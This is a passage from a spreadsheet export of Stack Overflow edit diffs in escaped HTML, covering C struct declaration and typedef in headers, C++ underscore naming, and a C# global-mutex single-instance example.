 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;ifndef&lt;/span&gt; SOME_HEADER_GUARD_WITH_UNIQUE_NAME&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;define&lt;/span&gt; SOME_HEADER_GUARD_WITH_UNIQUE_NAME&lt;/span&gt;_x000D_
_x000D_
&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;a&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-class"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-class"&gt;{&lt;/span&gt; _x000D_
    &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; i;_x000D_
    &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;b&lt;/span&gt; {&lt;/span&gt;_x000D_
        &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; j;_x000D_
    }_x000D_
};_x000D_
_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;endif&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I would put functions using this structure in the same header (the function that are "semantically" part of its "interface").&lt;/p&gt; _x000D_
 &lt;p&gt; And usually, I could name the file after the structure name, and use that name again to choose the header guards defines.&lt;/p&gt; _x000D_
 &lt;p&gt; If you need to declare a function using a pointer to the struct, you won't need the full struct definition. A simple forward declaration like:&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;a&lt;/span&gt; ;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Will be enough, and it decreases coupling.&lt;/p&gt; _x000D_
 &lt;p&gt; ###or can we define the total structure in header file and include that in both source.c and func.c?&lt;/p&gt; _x000D_
 &lt;p&gt; This is another way, easier somewhat, but less modular: Some code needing only your structure to work would still have to include all types.&lt;/p&gt; _x000D_
 &lt;p&gt; In C++, this could lead to interesting complication, but this is out of topic (no C++ tag), so I won't elaborate.&lt;/p&gt; _x000D_
 &lt;p&gt; ###then how to declare that structure as extern in both the files. ?&lt;/p&gt; _x000D_
 &lt;p&gt; I fail to see the point, perhaps, but Greg Hewgill has a very good answer in his post &lt;a href="http://stackoverflow.com/questions/228684/how-to-declare-a-structure-in-a-header-that-is-to-be-used-by-multiple-files-in-c#228691"&gt;How to declare a structure in a header that is to be used by multiple files in c?&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; ###shall we typedef it then how?&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; If you are using C++, don't.&lt;/li&gt; _x000D_
  &lt;li&gt; If you are using C, you should.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The reason being that C struct managing can be a pain: You have to declare the struct keyword everywhere it is used:&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStruct&lt;/span&gt; ;&lt;/span&gt; &lt;span class="hljs-comment"&gt;/* Forward declaration */&lt;/span&gt;_x000D_
_x000D_
&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStruct&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-class"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-class"&gt;{&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc. */&lt;/span&gt;_x000D_
} ;_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;doSomething&lt;/span&gt;&lt;span class="hljs-params"&gt;(struct MyStruct * p)&lt;/span&gt; &lt;/span&gt;&lt;span class="diff-delete"&gt;{ &lt;/span&gt;&lt;span class="hljs-comment"&gt;/* parameter */&lt;/span&gt;_x000D_
   &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStruct&lt;/span&gt; &lt;span class="hljs-title"&gt;a&lt;/span&gt; ;&lt;/span&gt; &lt;span class="hljs-comment"&gt;/* variable */&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc */&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; While a typedef will enable you to write it without the struct keyword.&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStructTag&lt;/span&gt; ;&lt;/span&gt; &lt;span class="hljs-comment"&gt;/* Forward declaration */&lt;/span&gt;_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;typedef&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStructTag&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-class"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-class"&gt;{&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc. */&lt;/span&gt;_x000D_
} MyStruct ;_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;doSomething&lt;/span&gt;&lt;span class="hljs-params"&gt;(MyStruct * p)&lt;/span&gt; &lt;/span&gt;&lt;span class="diff-delete"&gt;{ &lt;/span&gt;&lt;span class="hljs-comment"&gt;/* parameter */&lt;/span&gt;_x000D_
   MyStruct a ; &lt;span class="hljs-comment"&gt;/* variable */&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc */&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It is &lt;strong&gt;important&lt;/strong&gt; you still keep a name for the struct. Writing:&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;typedef&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-class"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-class"&gt;{&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc. */&lt;/span&gt;_x000D_
} MyStruct ;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; will just create an anonymous struct with a typedef-ed name, and you won't be able to forward-declare it. So keep to the following format:&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;typedef&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStructTag&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-class"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-class"&gt;{&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc. */&lt;/span&gt;_x000D_
} MyStruct ;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Thus, you'll be able to use MyStruct everywhere you want to avoid adding the struct keyword, and still use MyStructTag when a typedef won't work (i.e. forward declaration)&lt;/p&gt; _x000D_
 &lt;p&gt; ###Edit:&lt;/p&gt; _x000D_
 &lt;p&gt; Corrected wrong assumption about C99 struct declaration, as rightfully remarked by Jonathan Leffler.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; ###if this structure is to be used by some other file func.c how to do it?&lt;/p&gt; _x000D_
 &lt;p&gt; When a type is used in a file (i.e. func.c file), it must be visible. The very worst way to do it is copy paste it in each source file needed it.&lt;/p&gt; _x000D_
 &lt;p&gt; The right way is putting it in an header file, and include this header file whenever needed.&lt;/p&gt; _x000D_
 &lt;p&gt; ###shall we open a new header file and declare the structure there and include that header in the func.c?&lt;/p&gt; _x000D_
 &lt;p&gt; This is the solution I like more, because it makes the code highly modular. I would code your struct as:&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;ifndef&lt;/span&gt; SOME_HEADER_GUARD_WITH_UNIQUE_NAME&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;define&lt;/span&gt; SOME_HEADER_GUARD_WITH_UNIQUE_NAME&lt;/span&gt;_x000D_
_x000D_
&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;a&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-class"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-class"&gt;{&lt;/span&gt; _x000D_
    &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; i;_x000D_
    &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;b&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-class"&gt;_x000D_
   &lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-class"&gt; {&lt;/span&gt;_x000D_
        &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; j;_x000D_
    }_x000D_
};_x000D_
_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;endif&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I would put functions using this structure in the same header (the function that are "semantically" part of its "interface").&lt;/p&gt; _x000D_
 &lt;p&gt; And usually, I could name the file after the structure name, and use that name again to choose the header guards defines.&lt;/p&gt; _x000D_
 &lt;p&gt; If you need to declare a function using a pointer to the struct, you won't need the full struct definition. A simple forward declaration like:&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;a&lt;/span&gt; ;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Will be enough, and it decreases coupling.&lt;/p&gt; _x000D_
 &lt;p&gt; ###or can we define the total structure in header file and include that in both source.c and func.c?&lt;/p&gt; _x000D_
 &lt;p&gt; This is another way, easier somewhat, but less modular: Some code needing only your structure to work would still have to include all types.&lt;/p&gt; _x000D_
 &lt;p&gt; In C++, this could lead to interesting complication, but this is out of topic (no C++ tag), so I won't elaborate.&lt;/p&gt; _x000D_
 &lt;p&gt; ###then how to declare that structure as extern in both the files. ?&lt;/p&gt; _x000D_
 &lt;p&gt; I fail to see the point, perhaps, but Greg Hewgill has a very good answer in his post &lt;a href="http://stackoverflow.com/questions/228684/how-to-declare-a-structure-in-a-header-that-is-to-be-used-by-multiple-files-in-c#228691"&gt;How to declare a structure in a header that is to be used by multiple files in c?&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; ###shall we typedef it then how?&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; If you are using C++, don't.&lt;/li&gt; _x000D_
  &lt;li&gt; If you are using C, you should.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The reason being that C struct managing can be a pain: You have to declare the struct keyword everywhere it is used:&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStruct&lt;/span&gt; ;&lt;/span&gt; &lt;span class="hljs-comment"&gt;/* Forward declaration */&lt;/span&gt;_x000D_
_x000D_
&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStruct&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-class"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-class"&gt;{&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc. */&lt;/span&gt;_x000D_
} ;_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;doSomething&lt;/span&gt;&lt;span class="hljs-params"&gt;(struct MyStruct * p)&lt;/span&gt; &lt;span class="hljs-comment"&gt;/* parameter */&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-function"&gt;_x000D_
&lt;/span&gt;{&lt;/span&gt;_x000D_
   &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStruct&lt;/span&gt; &lt;span class="hljs-title"&gt;a&lt;/span&gt; ;&lt;/span&gt; &lt;span class="hljs-comment"&gt;/* variable */&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc */&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; While a typedef will enable you to write it without the struct keyword.&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStructTag&lt;/span&gt; ;&lt;/span&gt; &lt;span class="hljs-comment"&gt;/* Forward declaration */&lt;/span&gt;_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;typedef&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStructTag&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-class"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-class"&gt;{&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc. */&lt;/span&gt;_x000D_
} MyStruct ;_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;doSomething&lt;/span&gt;&lt;span class="hljs-params"&gt;(MyStruct * p)&lt;/span&gt; &lt;span class="hljs-comment"&gt;/* parameter */&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;span class="diff-add"&gt;{_x000D_
&lt;/span&gt;   MyStruct a ; &lt;span class="hljs-comment"&gt;/* variable */&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc */&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It is &lt;strong&gt;important&lt;/strong&gt; you still keep a name for the struct. Writing:&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;typedef&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-class"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-class"&gt;{&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc. */&lt;/span&gt;_x000D_
} MyStruct ;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; will just create an anonymous struct with a typedef-ed name, and you won't be able to forward-declare it. So keep to the following format:&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;typedef&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;MyStructTag&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-class"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-class"&gt;{&lt;/span&gt;_x000D_
   &lt;span class="hljs-comment"&gt;/* etc. */&lt;/span&gt;_x000D_
} MyStruct ;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Thus, you'll be able to use MyStruct everywhere you want to avoid adding the struct keyword, and still use MyStructTag when a typedef won't work (i.e. forward declaration)&lt;/p&gt; _x000D_
 &lt;p&gt; ###Edit:&lt;/p&gt; _x000D_
 &lt;p&gt; Corrected wrong assumption about C99 struct declaration, as rightfully remarked by Jonathan Leffler.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>paercebal</t>
  </si>
  <si>
    <t>Software Engineer</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It's common in C++ to name member variables with some kind of prefix to denote the fact that they're member variables, rather than local variables or parameters. If you've come from an MFC background, you'll probably use &lt;code&gt;m_foo&lt;/code&gt;. I've also seen &lt;code&gt;myFoo&lt;/code&gt; occasionally.&lt;/p&gt; _x000D_
 &lt;p&gt; C# (or possibly just .NET) seems to recommend using just an underscore, as in &lt;code&gt;_foo&lt;/code&gt;. Is this allowed by the C++ standard?&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It's common in C++ to name member variables with some kind of prefix to denote the fact that they're member variables, rather than local variables or parameters. If you've come from an MFC background, you'll probably use &lt;code&gt;m_foo&lt;/code&gt;. I've also seen &lt;code&gt;myFoo&lt;/code&gt; occasionally.&lt;/p&gt; _x000D_
 &lt;p&gt; C# (or possibly just .NET) seems to recommend using just an underscore, as in &lt;code&gt;_foo&lt;/code&gt;. Is this allowed by the C++ standard?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I want to make sure this is out there, because it's so hard to get right:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;    &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; System.Runtime.InteropServices;   &lt;span class="hljs-comment"&gt;//GuidAttribute&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; System.Reflection;                &lt;span class="hljs-comment"&gt;//Assembly&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; System.Threading;                 &lt;span class="hljs-comment"&gt;//Mutex&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; System.Security.AccessControl;    &lt;span class="hljs-comment"&gt;//MutexAccessRule&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; System.Security.Principal;        &lt;span class="hljs-comment"&gt;//SecurityIdentifier&lt;/span&gt;_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;Main&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;[] args&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        &lt;span class="hljs-comment"&gt;// get application GUID as defined in AssemblyInfo.cs&lt;/span&gt;_x000D_
        &lt;span class="hljs-built_in"&gt;string&lt;/span&gt; appGuid = ((GuidAttribute)Assembly.GetExecutingAssembly().GetCustomAttributes(&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(GuidAttribute), &lt;span class="hljs-literal"&gt;false&lt;/span&gt;).GetValue(&lt;span class="hljs-number"&gt;0&lt;/span&gt;)).Value.ToString();_x000D_
        _x000D_
        &lt;span class="hljs-comment"&gt;// unique id for global mutex - Global prefix means it is global to the machine&lt;/span&gt;_x000D_
        &lt;span class="hljs-built_in"&gt;string&lt;/span&gt; mutexId = &lt;span class="hljs-built_in"&gt;string&lt;/span&gt;.Format( &lt;span class="hljs-string"&gt;"Global\\{{{0}}}"&lt;/span&gt;, appGuid );_x000D_
_x000D_
        &lt;span class="hljs-comment"&gt;// Need a place to store a return value in Mutex() constructor call&lt;/span&gt;_x000D_
        &lt;span class="hljs-built_in"&gt;bool&lt;/span&gt; createdNew;_x000D_
_x000D_
        &lt;span class="hljs-comment"&gt;// edited by Jeremy Wiebe to add example of setting up security for multi-user usage&lt;/span&gt;_x000D_
        &lt;span class="hljs-comment"&gt;// edited by 'Marc' to work also on localized systems (don't use just "Everyone") &lt;/span&gt;_x000D_
        &lt;span class="diff-delete"&gt;MutexAccessRule&lt;/span&gt; allowEveryoneRule = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; MutexAccessRule(&lt;span class="hljs-keyword"&gt;new&lt;/span&gt; SecurityIdentifier(WellKnownSidType.WorldSid, &lt;span class="hljs-literal"&gt;null&lt;/span&gt;), MutexRights.FullControl, AccessControlType.Allow);_x000D_
        &lt;span class="diff-delete"&gt;MutexSecurity&lt;/span&gt; securitySettings = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; MutexSecurity();_x000D_
        securitySettings.AddAccessRule(allowEveryoneRule);_x000D_
_x000D_
        &lt;span class="hljs-comment"&gt;// edited by MasonGZhwiti to prevent race condition on security settings via VanNguyen&lt;/span&gt;_x000D_
        &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; (&lt;span class="diff-delete"&gt;Mutex&lt;/span&gt; mutex = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Mutex(&lt;span class="hljs-literal"&gt;false&lt;/span&gt;, mutexId, &lt;span class="hljs-keyword"&gt;out&lt;/span&gt; createdNew, securitySettings))_x000D_
        {_x000D_
            &lt;span class="hljs-comment"&gt;// edited by acidzombie24&lt;/span&gt;_x000D_
            &lt;span class="diff-delete"&gt;&lt;span class="hljs-built_in"&gt;bool&lt;/span&gt;&lt;/span&gt; hasHandle = &lt;span class="hljs-literal"&gt;false&lt;/span&gt;;_x000D_
            &lt;span class="hljs-keyword"&gt;try&lt;/span&gt;_x000D_
            {_x000D_
                &lt;span class="hljs-keyword"&gt;try&lt;/span&gt;_x000D_
                {_x000D_
                    &lt;span class="hljs-comment"&gt;// note, you may want to time out here instead of waiting forever&lt;/span&gt;_x000D_
                    &lt;span class="hljs-comment"&gt;// edited by acidzombie24&lt;/span&gt;_x000D_
                    &lt;span class="hljs-comment"&gt;// mutex.WaitOne(Timeout.Infinite, false);&lt;/span&gt;_x000D_
                    hasHandle = mutex.WaitOne(&lt;span class="hljs-number"&gt;5000&lt;/span&gt;, &lt;span class="hljs-literal"&gt;false&lt;/span&gt;);_x000D_
                    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (hasHandle == &lt;span class="hljs-literal"&gt;false&lt;/span&gt;)_x000D_
                        &lt;span class="hljs-keyword"&gt;throw&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; TimeoutException(&lt;span class="hljs-string"&gt;"Timeout waiting for exclusive access"&lt;/span&gt;);_x000D_
                }_x000D_
                catch (AbandonedMutexException)_x000D_
                {_x000D_
                    &lt;span class="hljs-comment"&gt;// Log the fact that the mutex was abandoned in another process, it will still get acquired&lt;/span&gt;_x000D_
                    hasHandle = &lt;span class="hljs-literal"&gt;true&lt;/span&gt;;_x000D_
                }_x000D_
_x000D_
                &lt;span class="hljs-comment"&gt;// Perform your work here.&lt;/span&gt;_x000D_
            }_x000D_
            &lt;span class="hljs-keyword"&gt;finally&lt;/span&gt;_x000D_
            {_x000D_
                &lt;span class="hljs-comment"&gt;// edited by acidzombie24, added if statement&lt;/span&gt;_x000D_
                &lt;span class="hljs-keyword"&gt;if&lt;/span&gt;(hasHandle)_x000D_
                    mutex.ReleaseMutex();_x000D_
            }_x000D_
        }_x000D_
    }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I want to make sure this is out there, because it's so hard to get right:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;    &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; System.Runtime.InteropServices;   &lt;span class="hljs-comment"&gt;//GuidAttribute&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; System.Reflection;                &lt;span class="hljs-comment"&gt;//Assembly&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; System.Threading;                 &lt;span class="hljs-comment"&gt;//Mutex&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; System.Security.AccessControl;    &lt;span class="hljs-comment"&gt;//MutexAccessRule&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; System.Security.Principal;        &lt;span class="hljs-comment"&gt;//SecurityIdentifier&lt;/span&gt;_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;Main&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;[] args&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        &lt;span class="hljs-comment"&gt;// get application GUID as defined in AssemblyInfo.cs&lt;/span&gt;_x000D_
        &lt;span class="hljs-built_in"&gt;string&lt;/span&gt; appGuid = ((GuidAttribute)Assembly.GetExecutingAssembly().GetCustomAttributes(&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(GuidAttribute), &lt;span class="hljs-literal"&gt;false&lt;/span&gt;).GetValue(&lt;span class="hljs-number"&gt;0&lt;/span&gt;)).Value.ToString();_x000D_
        _x000D_
        &lt;span class="hljs-comment"&gt;// unique id for global mutex - Global prefix means it is global to the machine&lt;/span&gt;_x000D_
        &lt;span class="hljs-built_in"&gt;string&lt;/span&gt; mutexId = &lt;span class="hljs-built_in"&gt;string&lt;/span&gt;.Format( &lt;span class="hljs-string"&gt;"Global\\{{{0}}}"&lt;/span&gt;, appGuid );_x000D_
_x000D_
        &lt;span class="hljs-comment"&gt;// Need a place to store a return value in Mutex() constructor call&lt;/span&gt;_x000D_
        &lt;span class="hljs-built_in"&gt;bool&lt;/span&gt; createdNew;_x000D_
_x000D_
        &lt;span class="hljs-comment"&gt;// edited by Jeremy Wiebe to add example of setting up security for multi-user usage&lt;/span&gt;_x000D_
        &lt;span class="hljs-comment"&gt;// edited by 'Marc' to work also on localized systems (don't use just "Everyone") &lt;/span&gt;_x000D_
        &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt;&lt;/span&gt; allowEveryoneRule = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; MutexAccessRule(&lt;span class="hljs-keyword"&gt;new&lt;/span&gt; SecurityIdentifier(WellKnownSidType.WorldSid, &lt;span class="hljs-literal"&gt;null&lt;/span&gt;), MutexRights.FullControl, AccessControlType.Allow);_x000D_
        &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt;&lt;/span&gt; securitySettings = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; MutexSecurity();_x000D_
        securitySettings.AddAccessRule(allowEveryoneRule);_x000D_
_x000D_
        &lt;span class="hljs-comment"&gt;// edited by MasonGZhwiti to prevent race condition on security settings via VanNguyen&lt;/span&gt;_x000D_
        &lt;span class="hljs-keyword"&gt;using&lt;/span&gt; (&lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt;&lt;/span&gt; mutex = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Mutex(&lt;span class="hljs-literal"&gt;false&lt;/span&gt;, mutexId, &lt;span class="hljs-keyword"&gt;out&lt;/span&gt; createdNew, securitySettings))_x000D_
        {_x000D_
            &lt;span class="hljs-comment"&gt;// edited by acidzombie24&lt;/span&gt;_x000D_
            &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt;&lt;/span&gt; hasHandle = &lt;span class="hljs-literal"&gt;false&lt;/span&gt;;_x000D_
